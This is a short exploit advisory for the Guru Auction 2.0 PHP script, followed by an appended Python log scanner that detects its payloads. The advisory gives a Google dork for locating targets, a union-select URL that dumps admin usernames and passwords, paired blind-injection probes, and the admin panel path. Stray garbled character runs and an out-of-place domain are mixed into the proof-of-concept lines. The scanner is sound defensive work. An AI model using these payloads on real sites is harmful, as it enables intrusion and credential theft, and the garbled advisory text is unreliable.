Guru Auction 2.0 Multiple SQL Injection Vulnerabilities
Author: v3n0m
Application: Guru Auction 2.0
Price: $49
Vendor: http://www.guruscript.com/
Google Dork: inurl:subcat.php?cate_id=

SQLi PoC:
) `' n8 S4 V p4 Z4 R& Y! A~~~~~~~~~~
1 J9 K& D4 Z6 H0 Ghttp://domain.tld/[path]/subcat.php?cate_id=-9999+union+all+select+null,group_concat(user_name,char(58),password),null+from+admin--

Blind SQLi PoC:
~~~~~~~~~~
http://www.political-security.com /[path]/detail.php?item_id=575+AND+SUBSTRING(@@version,1,1)=5 << true
http://domain.tld/[path]/detail.php?item_id=575+AND+SUBSTRING(@@version,1,1)=4 << false

Admin login:
~~~~~~~~~~
http://domain.tld/[path]/admin/
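As an added defensive example that is not part of this advisory, the following Python scans web-server access logs for the two request shapes shown above: the union-based payload against subcat.php?cate_id and the boolean blind probe against detail.php?item_id. The log lines, paths and IP addresses are constructed sample data, and the script names and parameter names are the only values taken from the advisory.

```python
import re
from urllib.parse import urlparse, parse_qs
# Constructed sample access-log lines (Combined Log Format); not taken from any real server.
SAMPLE_LOG = """\
10.0.0.5 - - [01/Jan/2024:10:00:01 +0000] "GET /shop/subcat.php?cate_id=12 HTTP/1.1" 200 5120
10.0.0.9 - - [01/Jan/2024:10:00:07 +0000] "GET /shop/subcat.php?cate_id=-9999+union+all+select+null,group_concat(user_name,char(58),password),null+from+admin-- HTTP/1.1" 200 6031
10.0.0.9 - - [01/Jan/2024:10:00:12 +0000] "GET /shop/detail.php?item_id=575+AND+SUBSTRING(@@version,1,1)=5 HTTP/1.1" 200 4410
10.0.0.9 - - [01/Jan/2024:10:00:13 +0000] "GET /shop/detail.php?item_id=575+AND+SUBSTRING(@@version,1,1)=4 HTTP/1.1" 200 3890
10.0.0.7 - - [01/Jan/2024:10:01:00 +0000] "GET /shop/detail.php?item_id=575 HTTP/1.1" 200 4410
"""
LOG_RE = re.compile(r'^(?P<ip>\S+) \S+ \S+ \[[^\]]+\] "\S+ (?P<url>\S+) \S+" \d+')

# Scripts and parameters the advisory names as injectable; both expect a plain numeric id.
WATCHED_PARAMS = {"subcat.php": {"cate_id"}, "detail.php": {"item_id"}}

# SQL fragments used by the advisory's two PoC styles (union-based and boolean blind).
SQLI_PATTERNS = [
    ("union-select", re.compile(r"union\s+(all\s+)?select", re.I)),
    ("blind-boolean", re.compile(r"\b(and|or)\s+substring\s*\(", re.I)),
    ("mysql-version-probe", re.compile(r"@@version", re.I)),
    ("comment-terminator", re.compile(r"--|/\*")),
    ("concat", re.compile(r"group_concat\s*\(|char\s*\(", re.I)),
]

def classify_request(url):
    """Return (script, param, [pattern names]) if a watched parameter carries an SQLi payload, else None."""
    parsed = urlparse(url)
    script = parsed.path.rsplit("/", 1)[-1]
    # parse_qs URL-decodes, so '+' and %xx become the characters the database would see.
    for name, values in parse_qs(parsed.query).items():
        if name not in WATCHED_PARAMS.get(script, ()):
            continue
        for value in values:
            if value.lstrip("-").isdigit():
                continue  # a bare integer is the only legitimate shape for these ids
            hits = [label for label, rx in SQLI_PATTERNS if rx.search(value)]
            if hits:
                return (script, name, hits)
    return None

def scan_log(text):
    """Return a list of (ip, script, param, hits) for every log line that looks like an SQLi attempt."""
    findings = []
    for line in text.splitlines():
        m = LOG_RE.match(line)
        result = classify_request(m.group("url")) if m else None
        if result:
            findings.append((m.group("ip"),) + result)
    return findings
```

The same source IP hitting detail.php with paired true/false probes within seconds is the blind-injection signature worth alerting on; the 200 status on both lines shows why status codes alone do not reveal it.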